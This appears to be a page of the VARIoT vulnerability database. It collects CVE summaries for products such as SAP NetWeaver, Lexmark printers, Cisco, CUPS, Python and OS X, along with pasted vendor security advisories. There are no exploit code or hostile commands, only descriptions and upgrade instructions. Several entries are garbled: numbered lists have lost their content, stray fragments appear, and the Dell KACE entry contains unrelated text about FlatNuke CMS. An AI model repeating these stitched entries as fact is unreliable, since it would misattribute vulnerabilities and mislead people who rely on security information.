VARIoT IoT vulnerabilities database

Unspecified vulnerability in the Portal WebDynPro in SAP NetWeaver allows remote attackers to obtain sensitive path information via unknown attack vectors. SAP NetWeaver is the technical foundation for SAP Business Suite solutions, SAP xApps composite applications, partner solutions, and custom applications. There are several vulnerabilities in SAP NetWeaver: 1. 2, the message server has an unspecified error, allowing the attacker to exploit the vulnerability to crash the server. 3. 4. SAP NetWeaver is prone to multiple security vulnerabilities, including: 1. An information-disclosure vulnerability 2. Multiple cross-site scripting vulnerabilities 3. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks

cgi-bin/postpf/cgi-bin/dynamic/config/config.html on Lexmark X94x before LC.BR.P142, X85x through LC4.BE.P487, X644 and X646 before LC2.MC.P374, X642 through LC2.MB.P318, W840 through LS.HA.P252, T64x before LS.ST.P344, X64xef through LC2.TI.P325, C935dn through LC.JO.P091, C920 through LS.TA.P152, C78x through LC.IO.P187, X78x through LC2.IO.P335, C77x through LC.CM.P052, X772 through LC2.TR.P291, C53x through LS.SW.P069, C52x through LS.FA.P150, 25xxN through LCL.CU.P114, N4000 through LC.MD.P119, N4050e through GO.GO.N206, N70xxe through LC.CO.N309, E450 through LM.SZ.P124, E350 through LE.PH.P129, and E250 through LE.PM.P126 printers allows remote attackers to remove the Password Protect administrative password via the vac.255.GENPASSWORD parameter. Certain Lexmark devices are vulnerable to unverified password changes and stored cross-site scripting attacks. Lexmark Laser Printers is a laser printer device. Lexmark Laser Printers manages the WEB interface for verification bypass vulnerabilities. An empty string. Attackers can exploit this issue to gain authenticated access to the affected device and access sensitive information, which may aid in further attacks

Cisco Unified Communications Manager (aka Unified CM) 9.1 (2.10000.28) and earlier allows local users to gain privileges by leveraging incorrect file permissions, aka Bug IDs CSCul24917 and CSCul24908. Vendors have confirmed this vulnerability Bug ID CSCul24917 and CSCul24908 It is released as.Authority may be obtained by using incorrect file permissions by local users. A local attacker can exploit this issue to gain escalated privileges. Very limited information is currently available regarding this issue. We will update this BID as more information emerges. This issue is being tracked by Cisco Bug ID's CSCul24917 and CSCul24908. This component provides a scalable, distributed and highly available enterprise IP telephony call processing solution

Multiple cross-site scripting (XSS) vulnerabilities on Lexmark W840 through LS.HA.P252, T64x before LS.ST.P344, C935dn through LC.JO.P091, C920 through LS.TA.P152, C53x through LS.SW.P069, C52x through LS.FA.P150, E450 through LM.SZ.P124, E350 through LE.PH.P129, and E250 through LE.PM.P126 printers allow remote authenticated users to inject arbitrary web script or HTML by using (1) SNMP or (2) the Embedded Web Server (EWS) to set the (a) Contact or (b) Location field. Certain Lexmark devices are vulnerable to unverified password changes and stored cross-site scripting attacks. Lexmark Laser Printers is a laser printer device. The Lexmark Laser Printers management web interface fails to properly filter the user input to the \"Location\" and \"Contact Name\" fields of the \"General Settings\" configuration page, allowing remote attackers to exploit the vulnerability to inject malicious scripts or HTML code when malicious data is viewed. Get sensitive information or hijack user sessions. Lexmark Laser Printers are prone to an HTML-injection vulnerability because they fail to sanitize user-supplied input. Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials or control how the site is rendered to the user. Other attacks are also possible

Smart Software Solutions (3S) CoDeSys Runtime Toolkit before 2.4.7.44 allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) via unspecified vectors. CoDeSys is a powerful PLC software programming tool that supports IEC61131-3 standard IL, ST, FBD, LD, CFC, SFC six PLC programming languages. 3S CoDeSys Runtime Toolkit is prone to a remote denial-of-service vulnerability. An attacker can exploit this issue to crash the application; denying service to legitimate users. Versions prior to CoDeSys Runtime Toolkit 2.4.7.44 are vulnerable. 3S-Smart Software Solutions CoDeSys is a set of PLC (programmable logic controller) software programming tools from 3S-Smart Software Solutions in Germany; CoDeSys Runtime Toolkit is a runtime toolkit of CoDeSys

The Schneider Electric Telvent SAGE 3030 RTU with firmware C3413-500-001D3_P4 and C3413-500-001F0_PB allows remote attackers to cause a denial of service (temporary outage and CPU consumption) via malformed DNP3 traffic. Schneider Electric provides total solutions for the energy and infrastructure, industrial, data center and network, building and residential markets in more than 100 countries. The SESU tool used by several of these products is used to update software on Windows PC systems. Attackers may exploit this issue to cause an affected device to crash, resulting in a denial-of-service condition. Telvent SAGE 3030 RTU C3413-500-001D3_P4 and C3413-500-001F0_PB are vulnerable; other versions may also be affected

Cross-site scripting (XSS) vulnerability in scheduler/client.c in Common Unix Printing System (CUPS) before 1.7.2 allows remote attackers to inject arbitrary web script or HTML via the URL path, related to the is_path_absolute function. CUPS is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. CUPS 1.6.4 is vulnerable; other versions may also be affected. The system is based on the Internet Printing Protocol (IPP) and provides most PostScript and raster printer services. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ===================================================================== Red Hat Security Advisory Synopsis: Moderate: cups security and bug fix update Advisory ID: RHSA-2014:1388-02 Product: Red Hat Enterprise Linux Advisory URL: https://rhn.redhat.com/errata/RHSA-2014-1388.html Issue date: 2014-10-14 CVE Names: CVE-2014-2856 CVE-2014-3537 CVE-2014-5029 CVE-2014-5030 CVE-2014-5031 ===================================================================== 1. Summary: Updated cups packages that fix multiple security issues and several bugs are now available for Red Hat Enterprise Linux 6. Red Hat Product Security has rated this update as having Moderate security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section. 2. Relevant releases/architectures: Red Hat Enterprise Linux Desktop (v. 6) - i386, x86_64 Red Hat Enterprise Linux Desktop Optional (v. 6) - i386, x86_64 Red Hat Enterprise Linux HPC Node (v. 6) - x86_64 Red Hat Enterprise Linux HPC Node Optional (v. 6) - x86_64 Red Hat Enterprise Linux Server (v. 6) - i386, ppc64, s390x, x86_64 Red Hat Enterprise Linux Server Optional (v. 6) - i386, ppc64, s390x, x86_64 Red Hat Enterprise Linux Workstation (v. 6) - i386, x86_64 Red Hat Enterprise Linux Workstation Optional (v. 6) - i386, x86_64 3. Description: CUPS provides a portable printing layer for Linux, UNIX, and similar operating systems. An attacker could use this flaw to perform a cross-site scripting attack against users of the CUPS web interface. (CVE-2014-2856) It was discovered that CUPS allowed certain users to create symbolic links in certain directories under /var/cache/cups/. A local user with the 'lp' group privileges could use this flaw to read the contents of arbitrary files on the system or, potentially, escalate their privileges on the system. (CVE-2014-3537, CVE-2014-5029, CVE-2014-5030, CVE-2014-5031) The CVE-2014-3537 issue was discovered by Francisco Alonso of Red Hat Product Security. These updated cups packages also include several bug fixes. Space precludes documenting all of these changes in this advisory. Users are directed to the Red Hat Enterprise Linux 6.6 Technical Notes, linked to in the References section, for information on the most significant of these changes. All cups users are advised to upgrade to these updated packages, which contain backported patches to correct these issues. After installing this update, the cupsd daemon will be restarted automatically. 4. Solution: Before applying this update, make sure all previously released errata relevant to your system have been applied. This update is available via the Red Hat Network. Details on how to use the Red Hat Network to apply this update are available at https://access.redhat.com/articles/11258 5. Bugs fixed (https://bugzilla.redhat.com/): 978387 - Bad IPP responses with version 2.0 (collection handling bug) 1012482 - /etc/cron.daily/cups breaks rule GEN003080 in Red Hat security guide 1087122 - CVE-2014-2856 cups: cross-site scripting flaw fixed in the 1.7.2 release 1115576 - CVE-2014-3537 cups: insufficient checking leads to privilege escalation 1122600 - CVE-2014-5029 cups: Incomplete fix for CVE-2014-3537 1128764 - CVE-2014-5030 cups: allows local users to read arbitrary files via a symlink attack 1128767 - CVE-2014-5031 cups: world-readable permissions 6. Package List: Red Hat Enterprise Linux Desktop (v. 6): Source: cups-1.4.2-67.el6.src.rpm i386: cups-1.4.2-67.el6.i686.rpm cups-debuginfo-1.4.2-67.el6.i686.rpm cups-libs-1.4.2-67.el6.i686.rpm cups-lpd-1.4.2-67.el6.i686.rpm x86_64: cups-1.4.2-67.el6.x86_64.rpm cups-debuginfo-1.4.2-67.el6.i686.rpm cups-debuginfo-1.4.2-67.el6.x86_64.rpm cups-libs-1.4.2-67.el6.i686.rpm cups-libs-1.4.2-67.el6.x86_64.rpm cups-lpd-1.4.2-67.el6.x86_64.rpm Red Hat Enterprise Linux Desktop Optional (v. 6): i386: cups-debuginfo-1.4.2-67.el6.i686.rpm cups-devel-1.4.2-67.el6.i686.rpm cups-php-1.4.2-67.el6.i686.rpm x86_64: cups-debuginfo-1.4.2-67.el6.i686.rpm cups-debuginfo-1.4.2-67.el6.x86_64.rpm cups-devel-1.4.2-67.el6.i686.rpm cups-devel-1.4.2-67.el6.x86_64.rpm cups-php-1.4.2-67.el6.x86_64.rpm Red Hat Enterprise Linux HPC Node (v. 6): Source: cups-1.4.2-67.el6.src.rpm x86_64: cups-1.4.2-67.el6.x86_64.rpm cups-debuginfo-1.4.2-67.el6.i686.rpm cups-debuginfo-1.4.2-67.el6.x86_64.rpm cups-libs-1.4.2-67.el6.i686.rpm cups-libs-1.4.2-67.el6.x86_64.rpm cups-lpd-1.4.2-67.el6.x86_64.rpm Red Hat Enterprise Linux HPC Node Optional (v. 6): x86_64: cups-debuginfo-1.4.2-67.el6.i686.rpm cups-debuginfo-1.4.2-67.el6.x86_64.rpm cups-devel-1.4.2-67.el6.i686.rpm cups-devel-1.4.2-67.el6.x86_64.rpm cups-php-1.4.2-67.el6.x86_64.rpm Red Hat Enterprise Linux Server (v. 6): Source: cups-1.4.2-67.el6.src.rpm i386: cups-1.4.2-67.el6.i686.rpm cups-debuginfo-1.4.2-67.el6.i686.rpm cups-devel-1.4.2-67.el6.i686.rpm cups-libs-1.4.2-67.el6.i686.rpm cups-lpd-1.4.2-67.el6.i686.rpm ppc64: cups-1.4.2-67.el6.ppc64.rpm cups-debuginfo-1.4.2-67.el6.ppc.rpm cups-debuginfo-1.4.2-67.el6.ppc64.rpm cups-devel-1.4.2-67.el6.ppc.rpm cups-devel-1.4.2-67.el6.ppc64.rpm cups-libs-1.4.2-67.el6.ppc.rpm cups-libs-1.4.2-67.el6.ppc64.rpm cups-lpd-1.4.2-67.el6.ppc64.rpm s390x: cups-1.4.2-67.el6.s390x.rpm cups-debuginfo-1.4.2-67.el6.s390.rpm cups-debuginfo-1.4.2-67.el6.s390x.rpm cups-devel-1.4.2-67.el6.s390.rpm cups-devel-1.4.2-67.el6.s390x.rpm cups-libs-1.4.2-67.el6.s390.rpm cups-libs-1.4.2-67.el6.s390x.rpm cups-lpd-1.4.2-67.el6.s390x.rpm x86_64: cups-1.4.2-67.el6.x86_64.rpm cups-debuginfo-1.4.2-67.el6.i686.rpm cups-debuginfo-1.4.2-67.el6.x86_64.rpm cups-devel-1.4.2-67.el6.i686.rpm cups-devel-1.4.2-67.el6.x86_64.rpm cups-libs-1.4.2-67.el6.i686.rpm cups-libs-1.4.2-67.el6.x86_64.rpm cups-lpd-1.4.2-67.el6.x86_64.rpm Red Hat Enterprise Linux Server Optional (v. 6): i386: cups-debuginfo-1.4.2-67.el6.i686.rpm cups-php-1.4.2-67.el6.i686.rpm ppc64: cups-debuginfo-1.4.2-67.el6.ppc64.rpm cups-php-1.4.2-67.el6.ppc64.rpm s390x: cups-debuginfo-1.4.2-67.el6.s390x.rpm cups-php-1.4.2-67.el6.s390x.rpm x86_64: cups-debuginfo-1.4.2-67.el6.x86_64.rpm cups-php-1.4.2-67.el6.x86_64.rpm Red Hat Enterprise Linux Workstation (v. 6): Source: cups-1.4.2-67.el6.src.rpm i386: cups-1.4.2-67.el6.i686.rpm cups-debuginfo-1.4.2-67.el6.i686.rpm cups-devel-1.4.2-67.el6.i686.rpm cups-libs-1.4.2-67.el6.i686.rpm cups-lpd-1.4.2-67.el6.i686.rpm x86_64: cups-1.4.2-67.el6.x86_64.rpm cups-debuginfo-1.4.2-67.el6.i686.rpm cups-debuginfo-1.4.2-67.el6.x86_64.rpm cups-devel-1.4.2-67.el6.i686.rpm cups-devel-1.4.2-67.el6.x86_64.rpm cups-libs-1.4.2-67.el6.i686.rpm cups-libs-1.4.2-67.el6.x86_64.rpm cups-lpd-1.4.2-67.el6.x86_64.rpm Red Hat Enterprise Linux Workstation Optional (v. 6): i386: cups-debuginfo-1.4.2-67.el6.i686.rpm cups-php-1.4.2-67.el6.i686.rpm x86_64: cups-debuginfo-1.4.2-67.el6.x86_64.rpm cups-php-1.4.2-67.el6.x86_64.rpm These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/#package 7. References: https://www.redhat.com/security/data/cve/CVE-2014-2856.html https://www.redhat.com/security/data/cve/CVE-2014-3537.html https://www.redhat.com/security/data/cve/CVE-2014-5029.html https://www.redhat.com/security/data/cve/CVE-2014-5030.html https://www.redhat.com/security/data/cve/CVE-2014-5031.html https://access.redhat.com/security/updates/classification/#moderate https://access.redhat.com/documentation/en-US/Red_Hat_Enterprise_Linux/6/html/6.6_Technical_Notes/cups.html#RHSA-2014-1388 8. Contact: The Red Hat security contact is <secalert@redhat.com>. More contact details at https://access.redhat.com/security/team/contact/ Copyright 2014 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1 iD8DBQFUPKsIXlSAg2UNWIIRApSvAJ9WxP5yQ+v5GDRGnSINYq0Pro0AoQCfXZqW WjIIQcBG+Sou8Is2vIFlLok= =5S/K -----END PGP SIGNATURE----- -- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce . It was discovered that the web interface in CUPS incorrectly validated permissions on rss files and directory index files. A malformed file with an invalid page header and compressed raster data can trigger a buffer overflow in cupsRasterReadPixels (CVE-2014-9679). _______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2856 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3537 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5029 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5030 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5031 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9679 http://advisories.mageia.org/MGASA-2014-0193.html http://advisories.mageia.org/MGASA-2014-0313.html http://advisories.mageia.org/MGASA-2015-0067.html _______________________________________________________________________ Updated Packages: Mandriva Business Server 2/X86_64: 0d1f31885b6c118b63449f2fdd821666 mbs2/x86_64/cups-1.7.0-8.1.mbs2.x86_64.rpm b5337600a386f902763653796a2cefdf mbs2/x86_64/cups-common-1.7.0-8.1.mbs2.x86_64.rpm 7b1513d85b5f22cd90bed23a35e44f51 mbs2/x86_64/cups-filesystem-1.7.0-8.1.mbs2.noarch.rpm c25fa9b9bba101274984fa2b7a62f7a3 mbs2/x86_64/lib64cups2-1.7.0-8.1.mbs2.x86_64.rpm df24a6b84fdafffaadf961ab4aa3640b mbs2/x86_64/lib64cups2-devel-1.7.0-8.1.mbs2.x86_64.rpm 5c172624c992de8ebb2bf8a2b232ee3a mbs2/SRPMS/cups-1.7.0-8.1.mbs2.src.rpm _______________________________________________________________________ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/en/support/security/advisories/ If you want to report vulnerabilities, please contact security_(at)_mandriva.com _______________________________________________________________________ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team <security*mandriva.com> -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.12 (GNU/Linux) iD8DBQFVF6q1mqjQ0CJFipgRAuxXAKDq8A/WlNzp54yRN7xnKy8ZBaRZQwCfSAh0 n7hHPzmYVzh2wFP6PffIl0E= =ykhv -----END PGP SIGNATURE----- . ============================================================================ Ubuntu Security Notice USN-2172-1 April 24, 2014 cups vulnerability ============================================================================ A security issue affects these releases of Ubuntu and its derivatives: - Ubuntu 13.10 - Ubuntu 12.10 - Ubuntu 12.04 LTS - Ubuntu 10.04 LTS Summary: CUPS could be made to expose sensitive information over the network. If an authenticated user were tricked into visiting a malicious website while logged into CUPS, a remote attacker could modify the CUPS configuration and possibly steal confidential data. Update instructions: The problem can be corrected by updating your system to the following package versions: Ubuntu 13.10: cups 1.7.0~rc1-0ubuntu5.3 Ubuntu 12.10: cups 1.6.1-0ubuntu11.6 Ubuntu 12.04 LTS: cups 1.5.3-0ubuntu8.2 Ubuntu 10.04 LTS: cups 1.4.3-1ubuntu1.11 In general, a standard system update will make all the necessary changes

Cross-site scripting (XSS) vulnerability in BusinessFlow/login in AlgoSec Firewall Analyzer 6.4 allows remote attackers to inject arbitrary web script or HTML via the message parameter. AlgoSec Firewall Analyzer (AFA) is a set of firewall analysis solutions from AlgoSec Company in the United States. The solution supports automatic detection of security loopholes in firewall policies

Cross-site scripting (XSS) vulnerability in adminui/user_list.php on the Dell KACE K1000 management appliance 5.5.90545 allows remote attackers to inject arbitrary web script or HTML via the LABEL_ID parameter. (CWE-79). Dell Provided by KACE K1000 Contains a cross-site scripting vulnerability. FlatNuke is a web content management system (CMS) based on text files. When a user browses an affected website, their browser will execute arbitrary script code provided by the attacker, which may cause the attacker to steal cookie-based authentication and launch other attacks. There are vulnerabilities in FlatNuke version 3.1.2, other versions may also be affected. Dell KACE K1000 is a set of IT equipment management solutions in the KACE system management series of Dell (Dell). This solution provides functions such as software distribution, configuration management, patch installation, and security vulnerability remediation. The vulnerability is caused by the fact that the adminui/user_list.php page does not sufficiently filter the 'LABEL_ID' parameter

Cross-site scripting (XSS) vulnerability in the HTTP control interface in the NAC Web Agent component in Cisco Identity Services Engine (ISE) allows remote attackers to inject arbitrary web script or HTML via a crafted URL, aka Bug ID CSCui15038. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. This issue is being tracked by Cisco Bug ID CSCui15038. The platform monitors the network by collecting real-time information on the network, users and devices, and formulating and implementing corresponding policies

Cross-site scripting (XSS) vulnerability in Cisco Identity Services Engine (ISE) 1.2 patch 2 and earlier allows remote attackers to inject arbitrary web script or HTML via a report containing a crafted URL that is not properly handled during generation of report-output pages, aka Bug ID CSCui15064. Cisco Identity Services Engine (ISE) Contains a cross-site scripting vulnerability. Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or control how the site is rendered to the user. Other attacks are also possible. This issue is being tracked by Cisco Bug ID CSCui15064. The platform monitors the network by collecting real-time information on the network, users and devices, and formulating and implementing corresponding policies. A remote attacker could exploit this vulnerability to inject arbitrary web script or HTML by injecting a malicious link to the report

Cisco WebEx Meetings Server allows remote authenticated users to bypass authorization checks and (1) join arbitrary meetings, or (2) terminate a meeting without having a host role, via a crafted URL, aka Bug ID CSCuj42346. An authenticated attacker can exploit this issue to bypass certain security restrictions and perform unauthorized actions. This may lead to further attacks. This issue is tracked by Cisco Bug ID CSCuj42346. Cisco WebEx Meetings Server (CWMS) is a set of multi-functional conference solutions including audio, video and Web conference in Cisco's WebEx conference solution

A path traversal vulnerability exists in A10 Networks AX Loadbalancer versions 2.6.1-GR1-P5, 2.7.0, and earlier. The vulnerability resides in the handling of the filename parameter in the /xml/downloads endpoint, which fails to properly sanitize user input. An unauthenticated attacker can exploit this flaw by sending crafted HTTP requests containing directory traversal sequences to read arbitrary files outside the intended directory. The files returned by the vulnerable endpoint are deleted from the system after retrieval. This can lead to unauthorized disclosure of sensitive information such as SSL certificates and private keys, as well as unintended file deletion. The A10 Networks AX ADC failed to properly process the 'filename' parameter data, allowing remote attackers to exploit the vulnerability to submit a special directory traversal sequence to view system file content with WEB privileges. A10 Networks AX ADC is an application delivery controller from A10 Networks. An attacker could use this loophole to traverse characters ('..') to access arbitrary files containing sensitive information. Information harvested may aid in launching further attacks

Python before 3.3.4 RC1 allows remote attackers to cause a denial of service (infinite loop and CPU consumption) via a file size value larger than the size of the zip file to the (1) ZipExtFile.read, (2) ZipExtFile.read(n), (3) ZipExtFile.readlines, (4) ZipFile.extract, or (5) ZipFile.extractall function. Python is prone to a denial-of-service vulnerability. Successful exploits may allow an attacker to cause an affected application to cause infinite loop consuming CPU resources, resulting in a denial-of-service condition. Python 3.4 and prior are vulnerable. The language is scalable, supports modules and packages, and supports multiple platforms. Background ========== Python is an interpreted, interactive, object-oriented programming language. Please review the CVE identifiers referenced below for details. Workaround ========== There is no known workaround at this time. Resolution ========== All Python 3.3 users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=dev-lang/python-3.3.5-r1" All Python 2.7 users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=dev-lang/python-2.7.9-r1" References ========== [ 1 ] CVE-2013-1752 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1752 [ 2 ] CVE-2013-7338 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-7338 [ 3 ] CVE-2014-1912 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1912 [ 4 ] CVE-2014-2667 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2667 [ 5 ] CVE-2014-4616 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4616 [ 6 ] CVE-2014-7185 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-7185 [ 7 ] CVE-2014-9365 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-9365 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: https://security.gentoo.org/glsa/201503-10 Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org. License ======= Copyright 2015 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 -----BEGIN PGP SIGNATURE----- iQEcBAEBCgAGBQJVCfz5AAoJEP7VAChXwav6BAQH/37082hDkAVJo/x2oDcGgPD8 Oa959AMZKEOJtV5vJxBmR4MYfIC2lOI7/vHpLs4dDoM/NthCZDRrN5YcWHhMbzed HVTyDeMKty2IHlCzCgwAPXv7C1dp/lNL0mFqjMHsRs0e1uxi/Ro50s77tyLlA25g Vn1uT7yhNhBMYZCDPmYb7FPhmJMKcIM3vXK5hL7paQB9yeIZ/wMAk46Ks2mMh8s7 1oMgVHDfkf0u82hM+8S8VQvVB+4NmXNLvU6BNxyvoJbZ5dxCu8+drY2/sQREEjZu fBC1u101ZrZpLzLSStDp6grBxK3EDgLEkQzNDuqtJRZxNf5ntHJJQpeM1P/s3Ns= =Dy8A -----END PGP SIGNATURE----- . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 APPLE-SA-2015-08-13-2 OS X Yosemite v10.10.5 and Security Update 2015-006 OS X Yosemite v10.10.5 and Security Update 2015-006 is now available and addresses the following: apache Available for: OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.4 Impact: Multiple vulnerabilities existed in Apache 2.4.16, the most serious of which may allow a remote attacker to cause a denial of service. Description: Multiple vulnerabilities existed in Apache versions prior to 2.4.16. These were addressed by updating Apache to version 2.4.16. CVE-ID CVE-2014-3581 CVE-2014-3583 CVE-2014-8109 CVE-2015-0228 CVE-2015-0253 CVE-2015-3183 CVE-2015-3185 apache_mod_php Available for: OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.4 Impact: Multiple vulnerabilities existed in PHP 5.5.20, the most serious of which may lead to arbitrary code execution. Description: Multiple vulnerabilities existed in PHP versions prior to 5.5.20. These were addressed by updating Apache to version 5.5.27. CVE-ID CVE-2015-2783 CVE-2015-2787 CVE-2015-3307 CVE-2015-3329 CVE-2015-3330 CVE-2015-4021 CVE-2015-4022 CVE-2015-4024 CVE-2015-4025 CVE-2015-4026 CVE-2015-4147 CVE-2015-4148 Apple ID OD Plug-in Available for: OS X Yosemite v10.10 to v10.10.4 Impact: A malicious application may be able change the password of a local user Description: In some circumstances, a state management issue existed in password authentication. The issue was addressed through improved state management. CVE-ID CVE-2015-3799 : an anonymous researcher working with HP's Zero Day Initiative AppleGraphicsControl Available for: OS X Yosemite v10.10 to v10.10.4 Impact: A malicious application may be able to determine kernel memory layout Description: An issue existed in AppleGraphicsControl which could have led to the disclosure of kernel memory layout. This issue was addressed through improved bounds checking. CVE-ID CVE-2015-5768 : JieTao Yang of KeenTeam Bluetooth Available for: OS X Yosemite v10.10 to v10.10.4 Impact: A local user may be able to execute arbitrary code with system privileges Description: A memory corruption issue existed in IOBluetoothHCIController. This issue was addressed through improved memory handling. CVE-ID CVE-2015-3779 : Teddy Reed of Facebook Security Bluetooth Available for: OS X Yosemite v10.10 to v10.10.4 Impact: A malicious application may be able to determine kernel memory layout Description: A memory management issue could have led to the disclosure of kernel memory layout. This issue was addressed with improved memory management. CVE-ID CVE-2015-3780 : Roberto Paleari and Aristide Fattori of Emaze Networks Bluetooth Available for: OS X Yosemite v10.10 to v10.10.4 Impact: A malicious app may be able to access notifications from other iCloud devices Description: An issue existed where a malicious app could access a Bluetooth-paired Mac or iOS device's Notification Center notifications via the Apple Notification Center Service. The issue affected devices using Handoff and logged into the same iCloud account. This issue was resolved by revoking access to the Apple Notification Center Service. CVE-ID CVE-2015-3786 : Xiaolong Bai (Tsinghua University), System Security Lab (Indiana University), Tongxin Li (Peking University), XiaoFeng Wang (Indiana University) Bluetooth Available for: OS X Yosemite v10.10 to v10.10.4 Impact: An attacker with privileged network position may be able to perform denial of service attack using malformed Bluetooth packets Description: An input validation issue existed in parsing of Bluetooth ACL packets. This issue was addressed through improved input validation. CVE-ID CVE-2015-3787 : Trend Micro Bluetooth Available for: OS X Yosemite v10.10 to v10.10.4 Impact: A local attacker may be able to cause unexpected application termination or arbitrary code execution Description: Multiple buffer overflow issues existed in blued's handling of XPC messages. These issues were addressed through improved bounds checking. CVE-ID CVE-2015-3777 : mitp0sh of [PDX] bootp Available for: OS X Yosemite v10.10 to v10.10.4 Impact: A malicious Wi-Fi network may be able to determine networks a device has previously accessed Description: Upon connecting to a Wi-Fi network, iOS may have broadcast MAC addresses of previously accessed networks via the DNAv4 protocol. This issue was addressed through disabling DNAv4 on unencrypted Wi-Fi networks. CVE-ID CVE-2015-3778 : Piers O'Hanlon of Oxford Internet Institute, University of Oxford (on the EPSRC Being There project) CloudKit Available for: OS X Yosemite v10.10 to v10.10.4 Impact: A malicious application may be able to access the iCloud user record of a previously signed in user Description: A state inconsistency existed in CloudKit when signing out users. This issue was addressed through improved state handling. CVE-ID CVE-2015-3782 : Deepkanwal Plaha of University of Toronto CoreMedia Playback Available for: OS X Yosemite v10.10 to v10.10.4 Impact: Viewing a maliciously crafted movie file may lead to an unexpected application termination or arbitrary code execution Description: Memory corruption issues existed in CoreMedia Playback. These were addressed through improved memory handling. CVE-ID CVE-2015-5777 : Apple CVE-2015-5778 : Apple CoreText Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.4 Impact: Processing a maliciously crafted font file may lead to an unexpected application termination or arbitrary code execution Description: A memory corruption issue existed in the processing of font files. This issue was addressed through improved input validation. CVE-ID CVE-2015-5761 : John Villamil (@day6reak), Yahoo Pentest Team CoreText Available for: OS X Yosemite v10.10 to v10.10.4 Impact: Processing a maliciously crafted font file may lead to an unexpected application termination or arbitrary code execution Description: A memory corruption issue existed in the processing of font files. This issue was addressed through improved input validation. CVE-ID CVE-2015-5755 : John Villamil (@day6reak), Yahoo Pentest Team curl Available for: OS X Yosemite v10.10 to v10.10.4 Impact: Multiple vulnerabilities in cURL and libcurl prior to 7.38.0, one of which may allow remote attackers to bypass the Same Origin Policy. Description: Multiple vulnerabilities existed in cURL and libcurl prior to 7.38.0. These issues were addressed by updating cURL to version 7.43.0. CVE-ID CVE-2014-3613 CVE-2014-3620 CVE-2014-3707 CVE-2014-8150 CVE-2014-8151 CVE-2015-3143 CVE-2015-3144 CVE-2015-3145 CVE-2015-3148 CVE-2015-3153 Data Detectors Engine Available for: OS X Yosemite v10.10 to v10.10.4 Impact: Processing a sequence of unicode characters can lead to an unexpected application termination or arbitrary code execution Description: Memory corruption issues existed in processing of Unicode characters. These issues were addressed through improved memory handling. CVE-ID CVE-2015-5750 : M1x7e1 of Safeye Team (www.safeye.org) Date & Time pref pane Available for: OS X Yosemite v10.10 to v10.10.4 Impact: Applications that rely on system time may have unexpected behavior Description: An authorization issue existed when modifying the system date and time preferences. This issue was addressed with additional authorization checks. CVE-ID CVE-2015-3757 : Mark S C Smith Dictionary Application Available for: OS X Yosemite v10.10 to v10.10.4 Impact: An attacker with a privileged network position may be able to intercept users' Dictionary app queries Description: An issue existed in the Dictionary app, which did not properly secure user communications. This issue was addressed by moving Dictionary queries to HTTPS. CVE-ID CVE-2015-3774 : Jeffrey Paul of EEQJ, Jan Bee of the Google Security Team DiskImages Available for: OS X Yosemite v10.10 to v10.10.4 Impact: Processing a maliciously crafted DMG file may lead to an unexpected application termination or arbitrary code execution with system privileges Description: A memory corruption issue existed in parsing of malformed DMG images. This issue was addressed through improved memory handling. CVE-ID CVE-2015-3800 : Frank Graziano of the Yahoo Pentest Team dyld Available for: OS X Yosemite v10.10 to v10.10.4 Impact: A local user may be able to execute arbitrary code with system privileges Description: A path validation issue existed in dyld. This was addressed through improved environment sanitization. CVE-ID CVE-2015-3760 : beist of grayhash, Stefan Esser FontParser Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.4 Impact: Processing a maliciously crafted font file may lead to an unexpected application termination or 